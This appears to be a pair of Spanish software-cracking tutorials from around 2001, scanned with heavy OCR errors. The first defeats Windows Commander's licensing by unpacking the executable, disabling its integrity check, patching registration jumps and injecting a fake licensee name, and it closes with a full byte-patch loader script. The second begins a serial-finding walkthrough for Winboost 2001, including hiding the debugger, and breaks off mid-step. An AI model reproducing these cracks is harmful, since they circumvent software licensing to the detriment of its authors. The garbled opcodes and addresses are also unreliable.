programa, pq de hecho, este 61 no es una instrucción de POPAD sino ke es una parte de otra instrucción (no se cual, 
no me he molestado en mirarlo). Por eso ahora lo ke vamos ha hacer es repetir la búsqueda pero ahora a partir de la 
posición ke nos han dado: 


S 5AE338 L FFFFFF 61 (nótese ke he puesto 5AE338 y no 5AE337 pq tenemos ke buscar más allá de la posición ke 
nos han dado, pues si ponemos 5AE337 nos devolverá otra vez 5AE337). 


Bien, ahora nos devuelve la posición 5AE4F3. Ponemos un bpx (breakpoint on execution) en esta posición y pulsamos 
FS. Ahora sí. Ahora el Sice ha roto donde queríamos. Si ahora pulsamos Fl10 tres veces llegaremos a un ret. Si 
pulsamos F10 otra vez veremos ke el salto ke hace desde este ret es muy grande y ke aterriza en la posición 543530. 
Pues bien, este es el punto de entrada original antes de ke el programa fuera comprimido. Anotamos este número, 
salimos del programa y volvemos a ejecutarlo. Paramos en el ya mencionado ret y ahí ponemos A en el Sice, ke es el 
comando para editar código en ensamblador. Ponemos 


JMP EIP 


De esta forma el programa entra en un bucle infinito. Salgamos del Sice y carguemos el ProcDump. En el menú de 
tareas abiertas debería haber el Windows Commander. Le damos con el botón derecho y seleccionamos "Dump Full”. 
Ahora volvemos a seleccionar el Windows Commander en el menú de tareas ke se estan ejecutando y le damos a "Kill 
Task" para ke cierra la aplicación (pq está en un bucle infinito).De esta forma tendremos el ejecutable original 
descomprimido. Ahora solo nos falta editar con el PE editor la cabecera de este ejecutable ke hemos obtenido y 
sustituir su entry point por el original ke ya hemos obtenido (recordemos ke el número ke debemos introducir es el 
entry point ke hemos encontrado menos el Image Base ke es 400000). Total ke el numero ke debemos introducir es: 
543530 - 400000 = 143530. 


Pos bien, si ahora ejecutamos el programa mediante el ejecutable descomprimido este debería funcionar correctamente. 
Ahora lo podemos desensamblar con el w32dasm y tener un listado muerto ke siempre resulta útil. Un recomendación 
es ke hagáis también una copia de seguridad del ejecutable descomprimido. 


Antes de ponernos a registrar el programa en si debemos eliminar la protección ke comprueba si el ejecutable ha sido 
modificado. Supongo ke os habréis dado cuenta ke el programa cuando lleva unos segundos en funcionamiento nos 
muestra un mensaje diciendo ke el ejecutable ha sido modificado posiblemente un virus (aunque en este caso mejor ke 
dijera por un cracker...). Pos bien, el autor nos ayuda mucho pues pone el mensaje mediante un messageboxa. Por lo 
tanto ejecutamos el programa y ponemos: 


bpx MessageBoxA 


Esperamos unos segundos y el saltaremos al soft ice. Pulsamos F12 para salir de la función MessageBoxaA en si, le 
damos al enter y aterrizamos en la llamada ke hace el ejecutable del win. commander a esta función. Anotamos esta 
dirección, ke es 4EAC67 y vamos al w32dasm. Donde nos encontramos: 


* Referenced by a an or (C)onditional Jump at Address: 
:OO4EAOOS(C) Sram Este salto será la clave 


* Possible Reference to String Resource ID=01345: "Print" 


:004EAC21 6841050000 push 00000541 

:004EAC26 8B45FC mov eax, dword ptr [ebp-04] 

:004EAC29 ESSAGEFSFF call 00421AB8 

:004EACZE 50 push eax 

:004EAC2F ESC4ADFIFF call 004059F8 

:004EAC34 8B453FC mov eax, dword ptr [ebp-04] 

:004EAC37 C6801F05000000 mov byte ptr [eax+0000051F], 00 


* Possible Reference to String Resource ID=00016: "Specify file type” 


| 
:004EAC3E 6A10 push 00000010 
:004EAC40 ESFBADFIFF call 00405440 


* Possible Reference to String Resource ID=00016: "Specify file type” 
:004EAC45 6A1O0 push 00000010 
* Possible StringData Ref from Code Obj ->"Windows Commander" 


| 

:004EAC47 A104485400 mov eax, dword ptr [00544804] 

:004EAC4C 50 push eax 

:004EAC4D 8DESEAFDFFFF lea eax, dword ptr [ebp+ FFFFFDE4A] 

:004EACS3 ES7CFOFIFF call 00409CD4 

:004EAC58 50 push eax 

:004EAC59 8B453FC mov eax, dword ptr [ebp-04] 

:004EAC5C ESS76EF3FF call 0042 1AB8 

:004EAC61 50 push eax 

:004EAC62 ESEIADFIFF call 00405448 Serrano Este es el call al MessageBoxA 


:004EAC67 6A00 push 00000000 rara, Akí es donde aterrizamos después de pulsar F12 


Bien, pues como veis he marcado el salto al ke se llega a la pantalla de "possible virus". Si vamos a este salto en 


4EA9OS y lo evitamos (poiendo nop) vemos ke ya no nos dará este mensaje y ke no saldrá del programa por mucho 
tiempo ke pase. 


Bueno, de hecho no es cierto. ¿Qué pasa si creamos un directorio, copiamos un fichero, etc...? Pues ke justo después de 
hacer lo ke se le pide sale inmediatamente del programa. Creo ke por el mismo motivo ke antes, pq detecta ke el 
fichero ha sido modificado. Pues vamos a solucionarlo. 


Vemos ke si entramos en el menú de Ayuda del win. comm. y entramos en "Acerca de Windows Commander" nos 
muestra una pantalla donde dice ke no estamos registrados, bla, bla, bla... Pero lo más importante es ke cuando la 
cerramos el programa también sale. Esta ventana es también un MessageBoxA. Por lo tanto vamos ha poner un bpx 
MessageBoxA otra vez. Entramos en "Acerca de Windows Commander" y salta el Sice. Le damos a F12, a aceptar y 
volvemos al Sice en la posición 4EAC67. Le damos unas cuantas veces al F10 hasta ke llegamos a 4F3BAB ke es un 
jz (salta si 0). Vamos a ver este salto en el w32dasm: 


* Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 
:004F271A(U), :004F2751(U), :004F2760(U), :004F2770(U), :004F2780(U) 
:004F2790(U), :004F27A0(U), :004F27B0(U), :004F27E6(C), :004F27FA(U) 
:004F2812(U), :004F2824(U), :004F2838(U), :004F2854A(U), :004F285C(U) 
:004F2869(U), :004F287C(U), :004F289B(U), :004F28AF(U), :004F28C1(U) 
:004F28D3(U), :004F28E7(U), :004F2905(U), :004F29ID(U), :004F2953(U) 
:004F2978(U), :004F2984(U), :004F2998(U), :004F29AC(U), :004F29BE(U) 
:004F29DA(U), :004F29F9(U), :004F2A0E(U), :004F2A23(U), :004F2A36(U) 
:004F2A4F(U), :004F2A62(U), :004F2A75(U), :004F2A88(U), :004F2A9B(U) 
:004F2AAE(U), :004F2ABF(U), :004F2AD3(U), :004F2AE7(U), :004F2AFB(U) 
:004F2BOF(U), :004F2B34(U), :004F2B5E(U), :004F2B6F(U), :004F2B80(U) 
:004F2B8F(U), :004F2B9E(U), :004F2BAD(U), :004F2BBC(U), :004F2BCB(U) 
:004F2BDA(U), :004F2BE8(U), :004F2BF9(U), :004F2C0A(U), :004F2CIB(U) 
:004F2C2C(U), :004F2C44(U), :004F2C55(U), :004F2C66(U), :004F2C75(U) 
:004F2C84(U), :004F2C93(U), :004F2CA2(U), :004F2CB1(U), :004F2CC0(U) 
:004F2CCE(U), :004F2CDF(U), :004F2CF0(U), :004F2DO1(U), :004F2D12(U) 
:004F2D2A(U), :004F2D3C(U), :004F2D4E(U), :004F2D7D(C), :004F2D88(U) 
:004F2D9A(U), :004F2DB0(U), :004F2DC6(U), :004F2DE8(C), :004F2E25(U) 
:004F2E47(C), :004F2E84(U), :004F2E98(U), :004F2EAC(U), :004F2EC6(U) 
:004F2ED8(U), :004F2EEA(U), :004F2EF4(U), :004F2F08(U), :004F2F1F(U) 
:004F2F36(U), :004F2F4D(U), :004F2F64(U), :004F2F7B(U), :004F2F92(U) 
:004F2FA9(U), :004F2FCO(U), :004F2FD7(U), :004F2FE4(U), :004F2FF1(U) 
:004F3025(U), :004F3048(C), :004F3076(U), :004F3099(U), :004F30B9(U) 
:004F30D2(U), :004F30ES(U), :004F30F2(U), :004F3101(U), :004F310B(U) 
:004F3115(U), :004F311F(U), :004F3129(U), :004F3146(U), :004F3166(U) 
:004F3186(U), :004F3198(U), :004F31B7(U), :004F31D6(U), :004F31F5(U) 
:004F3214(U), :004F322A(U), :004F3249(U), :004F325F(U), :004F3285(U) 
:004F328F(U), :004F32AC(U), :004F32C9(U), :004F32D5(U), :004F32E1(U) 
:004F3310(U), :004F333F(U), :004F339A(C), :004F33BE(U), :004F33D8(U) 
:004F33F2(U), :004F3461(U), :004F34BD(U), :004F3501(U), :004F355D(U) 
:004F3567(U), :004F35D8(U), :004F3607(C), :004F3634(U), :004F364E(U) 
:004F3658(U), :004F3687(C), :004F36B4(U), :004F36CE(U), :004F36D8(U) 
:004F36E8(U), :004F3737(U), :004F3746(U), :004F3758(U), :004F3767(C) 
:004F3781(U), :004F3793(U), :004F37AS(U), :004F37B7(U), :004F37C9(U) 
:004F37DB(U), :004F3830(U), :004F3842(U), :004F3854(U), :004F38CC(U) 
:004F3985(U), :004F3997(U), :004F39EF(U), :004F3A03(U), :004F3AOF(C) 
:004F3A1C(U), :004F3A28(C), :004F3A35(U), :004F3A44(U), :004F3ASE(C) 
:004F3A69(U), :004F3ABB(U), :004F3AD6(U), :004F3B70(U), :004F3B7B(U) 
:004F3B84(U) 


:004F3BA1 A198525400 mov eax, dword ptr [00545298] 
:004F3BA6 2DB9230000 sub eax, 000023B9 
:O004F3BAB 740A je OO4F3BB7 —— So=--- Este es el salto en cuestión 


Espectacular verdad ? Fijaos cuantas saltos se refieren a esta parte del programa. Si lo comprobamos con el fichero 
original sin modificar en absoluto el programa salta en 4F3BAB. Si lo hacemos des del fichero modificado no salta. 
Por lo tanto sustituiremos este je por un jmp incondicional. Para ello bastará con sustituir el 740A por EBOA (por ke 
EB significa salto incondicional y OA es la distancia a la ke saltará, ke es la misma ke en el je). 


Pues bien, ahora el programa ya no sale por na del mundo a menos ke nosotros se lo ordenemos. Por lo tanto ya 
podemos TRABAJAR COMODAMENTE. 


SEGUNDA PARTE: EL CRACK EN SI 


Bueno, esta parte ke hemos hecho era la sencilla. Ahora llega el curro de verdad. En realidad para mi lo complicado en 
este caso fue dar con la rutina de comprobación de registro. Y después empanarme de como crackearla. Pero de hecho 
es fácil (una vez lo sabes, claro está). Yo me tiré unos dias pa encontrarlo todo, pero yo os voy a dar la receta fácil con 
cierto truquillo. El truquillo consiste en buscar en el w32dasm la cadena de texto: "User licence". La encontramos en 
4D931C. Pues bien ahora vamos mirando donde empieza esta rutina, es decir buscamos algo del tipo "Referenced by a 
call at...". Lo encontramos bastante arriba: 


* Referenced by a CALL at Address: 
:004D6BI1IC 


:004D8CDO 55 push ebp 
:004D8CD1 8BEC mov ebp, esp 


También debemos encontrar el final de la rutina, para eso ponemos buscar en el menú para buscar el primer "ret" 
partiendo des del principio. Lo encontramos en 4D94DO9. Por lo tanto nuestra rutina de comprobación está 
comprendida entre 4D8CD0 y 4D94D09. Pos bien, si la miramos por encima a lo mejor no nos damos cuenta, pero si 
keremos llegar a ke se ejecute la parte donde dice User Licence (ke suponemos ke si se llega a ejecutar es pq cree ke el 
programa esta registrado) en realidad lo ke necesitamos es ke ebx sea diferente de 0. No voy a contar como se llega a 
esta conclusión, pq es largo, pero hay varias formas de verlo con solo mirar la porción de código ya mencionada y 
reparando en los test bl, bl ke hay dispersos por ahí (lo dejo como ejercicio). 


Pos bien, lo ke keremos nosotros es ke en ningún caso ebx sea 0. Para ke esto se cumpla debemos evitar ke se ejecuten 
todas las lineas del tipo: 


xor ebx, ebx 


Para ello nos situaremos al inicio de la rutina (en 4D8CDO0O) y pondremos find text en el w32dasm y buscaremos xor 
ebx, ebx. Iremos buscando hasta ke pasemos del final, es decir pararemos cuando encontremos un xor ebx, ebx ke esté 
más allá de 4D94D09. 


Encontraremos 6 xor ebx, ebx en : 
4D8DEO0, 4D9046, 4D90ED, 4D9146, 4D915C, 4D945D 


Ok, pero ahora lo ke tenemos ke hacer es ir al w32dasm y mirar todas las posiciones una a una. Para cada posición 
anotaremos el salto ke nos hace llegar a ella o ke lo evita. Es decir ke lo ke realmente nos importa es evitar ke se llegue 
a la linea del xor ebx, ebx, no bastará con nopear los xor ebx, ebx. Como son muchos yo pondré un par de ejemplos y 
vosotros haréis los demás. En el primer caso, el xor ebx, ebx de 4D8DEO: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
:004D8D9D(C) 


:004D8DB1 ESGAA7F2FF call 00403520 
:004D8DB6 83B80C00000000 cmp dword pr [eax+0000000C], 00000000 


:004D8DBD 7521 ¡ne OO4DEDEO SK rmmmnnmrrrrrrrrmoroo- Este es el salto ke lleba a xor ebx, ebx, lo evitaremos 
:004D8DBF 8D85E2FEFFFF lea eax, de [ebp+FFFFFEE2] 
:004D8DCS5 530 push eax 


:004D8DC6 8D9570FAFFFF lea edx, dword ptr [ebp+FFFFFA70] 
:004D8DCC 66B90004 mov cx, 0400 

:004D8DDO0 8BC6 mov eax, esi 

:004D8DD2 E83941F6FYF call 0043CF10 

:004D8DD7 8BC6 mov eax, esi 

:004D8DD9 E8C240F6FF call 0043CEAO 

:004D8DDE EBOB ¡mp 004D8DEB 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
:004D8DBD(C) 


:004D8DEO 33DB xor ebx, ebx rra Aquí está el primer xor ebx, ebx ke queremos evitar 
:004D8DE2 66C785E2FEFFFF0000 mov word ptr [ebp+FFFFFEE?2], 0000 


Como veis el salto ke debemos evitar es el de 4D8DBD. Os recomiendo ke os hagáis una pequeña lista con cada salto 
y al lado os pongáis lo ke debe hacer cada salto (pq hay saltos ke keremos ke salten y otros no). Es decir ke en este 
caso pondríamos: 


"4D8DBD evitar el salto" 


Por cierto, por si lo queréis saber este salto comprueba si existe un fichero llamado "wincmd.key" si está no salta y si 
está, salta hacia el código de no registrado. Si creáis el fichero wincmd.key veréis como este salto no haría falta 
modificarlo. 


Bien en el caso del xor ebx, ebx de 4D9046: 


:004D9040 0F84AE000000 je 004D90F4 
:004D9046 33DB xor ebx, ebx 


Bien, está claro ke el salto en 4D9040 debe saltar para evitar ke se ejecute el xor. Pondríamos en la lista: 


4D9040 debe saltar 


Bien, así lo haríamos con el resto de xor. Finalmente obtendríamos la lista siguiente: 

4D8DBD no debe saltar 

4D9050 debe saltar 

4D90ED no hace falta tocarlo pues ya tiene saltos incondicionales encima, luego nunca se ejecutará 
4D9144 debe saltar 

4D915A debe saltar 

4D945B debe saltar 


Muy bien, ahora pondríamos todos los breakpoints (el de 4D90ED vemos ke no hace falta) en esas direcciones y 
ejecutariamos el programa. Yo recomiendo ke al principio no modifiquemos nada, es decir ke al llegar a un salto, si 
por ejemplo es un jz y keremos ke salte y el sice nos indica ke tal y como estan las cosas no salta (al lado de la 
instrucción pone no jump) bastará con modificar el flag en cuestión. En este caso bastará con marcar en la pantalla de 
los registros del Sice (ke se activa poniendo wr) el registro en cuestión y pulsar "insert". De este modo vereis como 
donde antes ponía no jump ahora pone jump. 


Vale, pues si hacéis las pruebas veréis ke al final resulta ke solo nos hará falta modificar 3 de los saltos mencionados: 
4D8DBD lo "nopearemos" 


4D9040 cambiaremos de 0F84AE000000 a E9AF000000 90 (es decir un salto incondicional más un nop para ke 
Okupe los mismos bytes ke la instrucción inicial) 


4D945B forzaremos también el salto poniendo pasando de 7402 a EB02. 


Como habréis comprobado ahora ya no nos sale la nag screen y si vamos a "acerca de windows commander" nos pone 
ke estamos registrados y pone el user licence. Pero como veréis el nombre ke aparece es una mezcla de caracteres 
extraños. Esto se debe a ke la información de la persona ke se ha registrado la debería de recoger del fichero 
wincmd.key, pero este no existe (a menos ke lo hayas creado). En el siguiente apartado veremos como solucionar este 
problema sin tener ke crear el fichero wincmd.key ni nada. 


TERCERA PARTE: REGISTRADO A... 


Primero de todo deciros ke la idea de esta parte la saqué de un crack del windows commander 4.05 ke ya tenía hecho 
por otra persona. Es decir ke la idea de crackearlo así no es mia, pero voy a explicarla. 


La teoría es ke en alguna parte del código hay una función ke nos carga los datos "raros" ke vemos arriba o al abrir el 
menú de "acerca de windows commander". Estos datos, como ya he dicho, vendrían definidos por el fichero 
wincmd.key, pero yo no logré encontrar la manera en como se guardaban estos datos, y tampoco me maté mucho. En 
lugar de eso decidí ir directamente a esa función e intentar modificarla para ke me colocase en memoria los datos ke yo 
quisiera. Lo primero, pues, será encontrar dicha función. Esta función se encontrará dentro de la rutina ke hemos 
mencionado anteriormente, es decir, entre las líneas 4D8CDO y 4D94D0. Entre ellas encontraremos algún call ke una 
vez ejecutado dejará en memoria los extraños símbolos ke aparecen y ke deberían ser nuestro nombre o lo ke 
queramos. 


Utilicé un método rudimentario pero efectivo para averiguar cual era la función ke me cargaba los datos en memoria. 
Primero de todo me fijé en lo ke ponía arriba de la pantalla. Eran todo carácteres sin sentido, pero en mi caso había una 
secuencia por en medio ke ponia 74bC. Puse un bpx en 4D94D09, es decir al final de la función, en la instrucción ret. 
Ejecuté el programa con el breakpoint puesto y cuando se detuvo en 4D94D09 la teoría era ke la información de la 
cabecera ya debía estar en memoria pues se habría cargado en algún momento de la rutina. Sabía ke parte de esa 
información era 74bC. Así ke puse: 


S 0 L FFFFFF "74bC' Fijaos ke lo he puesto entre comillas simples pq estoy buscando ahora referencias de texto 
concretas y no un número como pasó cuando buscábamos el POPAD. Fijaos también ke se deben respetar las 
mayúsculas y las minúsculas. 


Muy bien, al poner esto apareció la cadena buscada en la pantalla de memoria. El resto de caracteres "ininteligibles" 
vemos ke son datos ke se salen del rango del código ASCII y ke por alguna razón se ponen caracteres "extraños" pues 


no sabe como interpretarlos. Pero por seguridad volví a repetir la búsqueda otra vez a partir de esta dirección de 
memoria ke en mi caso era 72F3F1: 


S 72F3F2 L FFFFFF "74bC' 


Con lo cual encontré otro lugar de memoria donde también havia esta información. Ya os digo ke lo primero ke hice 
fue aplicar la técnica ke comentaré a la primera vez ke encontré la información, pero no dió resultado, pq el resultado 
del primer lugar de memoria donde encontramos la información deseada está subeditado al segundo, es decir, depende 
de lo ke ya hubiera en el segundo lugar de memoria (ke en realidad se carga primero). Por lo tanto nosotros vamos a 
dejar en la pantalla el lugar donde está la información ke nos brinda la segunda búsqueda. 


Una vez tenemos la información ke keremos en la pantalla de memória ponemos un bpx al principio de la rutina de 
comprobación, es decir en 4D8CDO0. Volvemos ha arrancar el programa y este se detiene en 4D8CDO0 como es lógico. 
Si nos fijamos en ese momento en la pantalla de datos no aparecen los mismos datos ke antes. Por lo tanto los datos ke 
se colocarán en el marco de la pantalla aún no han sido cargados. Para encontrar la función donde se cargan yo empecé 
a pulsar F10 estando atento a la pantalla de memoria esperando cualquier modificación. Al cabo de bastantes 
pulsaciones (ya os he dicho ke era un método rudimentario) vi ke la información se cargaba en 4D8FEO. En esta 
dirección hay un CALL 4D8B34 ke es el siguiente: 


* Referenced by a CALL at Addresses: 
:004D8C2B , :004D8C3F , :004D8E7F', :004D8ED3 , :004D8FE0O 
:004D93FB , :004D96AE 


:004D8B34 53 push ebp 

:004D8B35 8BEC mov ebp, esp 

:004D8B37 83C4F8 add esp, FEFFFFFS 

:004D8B3A 53 push ebx 

:004D8B3B 56 push esi 

:004D8B3C 57 push edi 

:004D8B3D 8BF9 mov edi, ecx 

:004D8B3F 8945FC mov dword ptr [ebp-04], eax 
:004D8B42 891520703400 mov dword ptr [0054702C], edx 


* Possible Reference to String Resource ID=00020: "Enter file name to edit: " 
| 
:004D8B48 C745F814000000 mov [ebp-08], 00000014 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
:004D8BAS(C) 


:004D8B4F 8BF7 mov esi, edi 

:004D8B51 85FÓ6 test esi, esi 

:004D8B33 7C1C ¡l 004D8B71 

:004D8B933 46 inc esi 

:004D8B536 8B3DFC mov ebx, dword ptr [ebp-04] 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
:004D8B6F(C) 


:004D8B39 8D4701 lea eax, dword ptr [edi+01] 
:004D8B3C ESS39FF2FF call 00402AB4 
:004D8B61 8B35FC mov edx, dword ptr [ebp-04] 
:004D8B64 03D0 add edx, eax 

:004D8B66 8BC3 mov eax, ebx 

:004D8B68 ESBBFFFFFF call 004D8B28 
:004D8B6D 43 inc ebx 

:004D8BO6E 4E dec esi 

:004D8B6F 75E8 ¡ne 004D8B59 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
:004D8B53(C) 


:004D8B71 8BF7 mov esi, edi 

:004D8B73 85FÓ6 test esi, esi 

:004D8B75 7C2B ¡l 004D8BA2 

:004D8B77 46 inc esi 

:004D8B78 8B3DFC mov ebx, dword ptr [ebp-04] 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
:004D8BA0(C) 


* Possible Reference to String Resource ID=00008: "Do you really want to delete the Ji selected files/directori" 


:004D8B7B B808000000 mov eax, 00000008 
:004D8B80 ES2F9FF2FF call 00402AB4 
:004D8B83 8BDO mov edx, eax 

:004D8B87 8BC3 mov eax, ebx 


:004D8B89 EST6FFFFFF call 004D8B04 
:004D8B8E B800010000 mov eax, 00000100 
:004D8B93 ESIC9FF2FF call 00402AB4 
:004D8B98 8A13 mov dl, byte ptr [ebx] 
:004D8B9A 32C2 xor al, dl 

:004D8B9C 8803 mov byte ptr [ebx], al 
:004D8B9E 43 inc ebx 

:004D8B9F 4E dec esi 

:004D8BAO 753D9 jne 004D8B7B 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
:004D8B753(C) 


:004D8BA2 FF4DF38 dec [ebp-08] 
:004D8BAS 75A8 ¡ne 004D8B4F 
:004D8BA7 5F pop edi 
:004D8BAS 5E pop esi 
:004D8BA9 5B pop ebx 
:004D8BAA 539 pop ecx 
:004D8BAB 59 pop ecx 
:004D8BAC 5D pop ebp 
:004D8BAD C3 ret 


Pues muy bien, como esta llamada lo único ke hace es cargar los datos de la persona en memoria la sobreescribiremos 
y lo haremos "manualmente". Es decir vamos a fijarnos un poco a ver lo ke hace la rutina y vamos a sustituirla entera 
por una ke haga lo ke nosotros keramos. Lo primero de todo será ver dónde tenemos ke cargar los datos. Si nos fijamos 
vemos ke el primer dato ke lee a la hora de poner el texto en la pantalla es el ke está en la dirección de EAX al inicio 
de la rutina más 1A (siempre hablando en cifras en hexadecimal, por supuesto). Por lo tanto lo primero será sumar a 
EAX el valor 1A, por ejemplo con la función de suma ADD. Luego, a partir de ahí pondremos los sucesivos caracteres 
ke nosotros queramos de la forma: 


MOV byte ptr[E AX] n” de caracter en ASCII 
inc EAX (debemos incrementar eax para ke avance una posición de memoria) 
Total, ke al final la rutina ke nos quedará será la siguiente: 


* Referenced by a CALL at Addresses: 
|1:004D8C2B , :004D8C3F , :004D8E7F , :004D8SED3 , :004D8FEO 
[:004D93FB , :004D96AE 


DER 0517000000 add eax, 00000017 Kn Fijaos ke no he incrementado eax en lA directamente 
:004D8B39 C60000 mov byte ptr [eax], 00 sino ke previamente le he sumado 17 y luego 
3. 

:004D8B3C 0503000000 add eax, 00000003 El porque lo comento más abajo. 
:004D8B41 C60053 mov byte ptr [eax], 53 
:004D8B44 40 inc eax 

:004D8B45 C6006E mov byte ptr [eax], 6É 
:004D8B48 40 inc eax 

:004D8B49 C6004F mov byte ptr [eax], 4F 
:004D8B4C 40 inc eax 

:004D8B4D C60070 mov byte ptr [eax], 70 
:004D8B50 40 inc eax 

:004D8B51 C60020 mov byte ptr [eax], 20 
:004D8B54 40 inc eax 

:004D8B35 C60043 mov byte ptr [eax], 43 
:004D8B58 40 inc eax 

:004D8B59 C60072 mov byte ptr [eax], 72 
:004D8B5C 40 inc eax 

:004D8B3D C60061 mov byte ptr [eax], 61 
:004D8B60 40 inc eax 

:004D8B61 C60063 mov byte ptr [eax], 63 
:004D8B64 40 inc eax 

:004D8B65 C6006B mov byte ptr [eax], 6B 
:004D8B68 40 inc eax 

:004D8B69 C60065 mov byte ptr [eax], 65 
:004D8B6C 40 inc eax 

:004D8B6D C60064 mov byte ptr [eax], 64 
:004D8B70 40 inc eax 

:004D8B71 C60020 mov byte ptr [eax], 20 
:004D8B74 40 inc eax 

:004D8B75 C60056 mov byte ptr [eax], 56 


:004D8B78 40 inc eax 

:004D8B79 C60065 mov byte ptr [eax], 65 
:004D8B7C 40 inc eax 

:004D8B7D C60072 mov byte ptr [eax], 72 
:004D8B80 40 inc eax 

:004D8B81 C60073 mov byte ptr [eax], 73 
:004D8B84 40 inc eax 

:004D8B85 C60069 mov byte ptr [eax], 69 
:004D8B88 40 inc eax 

:004D8B89 C6006F mov byte ptr [eax], 6F 
:004D8B8C 40 inc eax 

:004D8B8D C6006É mov byte ptr [eax], 6É 
:004D8B90 40 inc eax 

:004D8B91 C60020 mov byte ptr [eax], 20 
:004D8B94 40 inc eax 

:004D8B95 C60032 mov byte ptr [eax], 32 
:004D8B98 40 inc eax 

:004D8B99 C60030 mov byte ptr [eax], 30 
:004D8B9C 40 inc eax 

:004D8B9D C60030 mov byte ptr [eax], 30 
:004D8BAO 40 inc eax 

:004D8BA1 C60031 mov byte ptr [eax], 31 
:004D8BA4 40 inc eax 

:004D8BAS C60020 mov byte ptr [eax], 20 
:004D8BA8 40 inc eax 

:004D8BA9 C60000 mov byte ptr [eax], 00 Sim El 0 es el código ke le hace "parar de escribir” 
:004D8BAC 90 nop 

:004D8BAD C3 ret 


Bien, como veréis he comentado un par de cosas. Lo primero es ke en eax+17 he colocado un 0. Esto es pq si no lo 
hacemos así al ir a la pantalla de "Acerca de windows commander" nos aparece una línea de 3 caracteres debajo del 
nombre ke viene regída por los 3 caracteres ke van desde eax+17 a eax+19 (ambos inclusive). Pero si ponemos un O 
en eax+17 el programa no escribirá nada, pues el código O significa "deja de escribir". Por eso en la línea 4D8BA9 
también hay un 0. De esta forma el programa deja de escribir a partir de ahí. Si lo quitamos veremos como el programa 
continua escribiendo caracteres hasta el final de la ventana como hacia anteriormente. Esto de ke el O significa "deja de 
escribir" lo podemos ver si buscamos la cadena SIN REGISTRAR en la memoria del programa sin crackear, ke acaba 
con un 0. 


Pues ya está. Ya tenemos el programa crackeado. En este caso el nombre será: "SnOp cracked version 2001". Pero a la 
hora de escribir cualquier cosa mejor ke lo hagáis desde un editor hexadecimal y busquéis el lugar de esta función. Allí 
os será fácil escribir directamente con el teclado sin tener ke saber cuáles son los códigos de las letras en ASCIT. 


Ahora ya podemos hacer el cargador ("loader") con toda la información ke tenemos. Será como sigue: 


L=2000 

F=wincmd32.EXE: 

O=wc452ldr.exe: 

P=4D8DBD/75,21/90,90: 

P=4D9040/0F, 84,AE,00,00,00/E9,AF,00,00,00,90: 
P=4D945B/74/EB: 

P=4F3BAB/74/EB: 

P=4EA908/0F, 84, 13,03,00,00/90,90,90,90,90,90: 


p=4D8B34/55,8B,EC,83,C4,F8,53,56,57,8B,F"9,89,45,F'C,89,15,2C,70,54,00,C7,45,F8, 14,00,00,00,8B,F7,85,F6,7C,1C 
,46,8B,5D,FC,8D,47,01,E8,53, 9F, F2,FF,8B,55,FC,03,D0,8B,C3,ES,BB,FF, FF,FF,43,4E,75,E8,8B,F7,85,F6,7C,2B,46 
8B,5D,FC,B8,08,00,00,00,E8,2F,9F,F2,FF,8B,D0,8B,C3,E8,76,FF, FF, FF,B8,00,01,00,00,E8,1C,9F,F2,FF,8A, 13,32, 
C2,88,03,43,4E,75,D9, FF,4D,F8,75,A8,5F,5E,5B,59,59,5D/05,17,00,00,00,C6,00,00,05,03,00,00,00,C6,00,53,40,C6, 
00,6E,40,C6,00,4F,40,C6,00,70,40,C6,00,20,40,C6,00,43,40,C6,00,72,40,C6,00,61,40,C6,00,63,40,C6,00,6B,40,C6, 
00,65,40,C6,00,64,40,C6,00,20,40,C6,00,56,40,C6,00,65,40,C6,00,72,40,C6,00,73,40,C6,00,69,40,C6,00,6F,40,C6, 


00,6E,40,C6,00,20,40,C6,00,32,40,C6,00,30,40,C6,00,30,40,C6,00,31,40,C6,00,20,40,C6,00,00,90: 
$ 


*Es un loader para el Risk! Process Patcher 


Finalmente deciros ke si nos lo queremos currar aún más podemos crear un fichero ke modifique el propio loader para 
ke modifique los bytes ke se escribirán en el nombre de modo ke cada usuario pueda personalizar su windows 
commander con su nombre. No lo he hecho, pero no es complicado. 


Nada más. Solo daros mi e-mail para dudas, correcciones, aclaraciones, quejas, felicitaciones... 


snopmailOterra.es 


SnOp 
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Programa: Winboost 2001 Estandart Edition 

PROTECCION: Serial. 

Objetivo: Buscar un Numero de Serie valido o parchar el Programa para ser usuario registrado 

Descripcion: 

Dificultad: Newbie 

DOWNLOAD: http://www.magellas.com/ 

Herramientas: Softice, IceDump 6.021 

CRACKER: Profesor_X FECHA: 20/02/2001 
INTRODUCCION 


Hola Amigos otro programa mas que analizamos, en este tutorial veremos como encontrar un numero de serie para 
todos los sharewares de la empresa Magellas software, una empresa que se especializa en desarrollar software y 
utilerias para Windows, ........ como podran ver aumente una nueva seccion que se llama : VALORACION DEL 
SOFTWARE en la cual pondremos la calificacion que se merece segun mi punto de vista, tomando en cuenta los 


siguientes parametros: 


1. sistema de proteccion 
2. Funcionalidad 
3. Calidad en programación 


AL ATAKE 


Comentario del Programa 


e Una utileria paraconfigurar muchas cosas de windows que no estan disponibles para todos, es compatible con 
windows 2000 


Objetivos 


1. Buscar un numero de serie para registrarnos 
2. Parchar el programa para ser usuario registrado 


Manos a la Obra 


Ahora lo primero es analizar con que esta hecho el Intenet Tweak que desde ahora lo llamaremos IT , lo analizaremos 
con una utileria muy buena que se llama Language 2000 v4.5.1.144 el que nos mostrará información realmente 
importante para la hora de atacar el programa; bueno el Language 2000 v4.5.1.144 nos mostrará los siguientes datos: 


19 C Archivos de programa Vintemet Tweak 2001 Vitweaks 


http: //w.nicrosott.com/visuale/ 


¡ASProtect /ASPack 
; exey Solodovnikov 
NUED: //www, aspack. com, 


:/ [we 


programa y ejecutemoslo, lo primero que sale es una ventana como esta: 


¡Welcome 


mmmm....como podemos ver nos aparecen tres botones.....si damos click en el boton que dice "REGISTER" nos 
mandara a otra ventana en la cual insertaremos nuestro nombre y cualquier numero 


ahora vamos y reiniciamos la PCera y cargamos el SOFTICE despues cargamos el IceDump 6.021, con el cual 
ocultaremos muy bien el SOFTICE para que no sea detectado, ejecutamos el programa e insertamos un nombre y 
numero de serie y antes de dar click en OK vamos y damos CONTROL D y ponemos un breakpoint BPX 
HMEMCPY , despues volvemos a dar CONTROL D y regresamos al programa en el cual damos click en el boton 
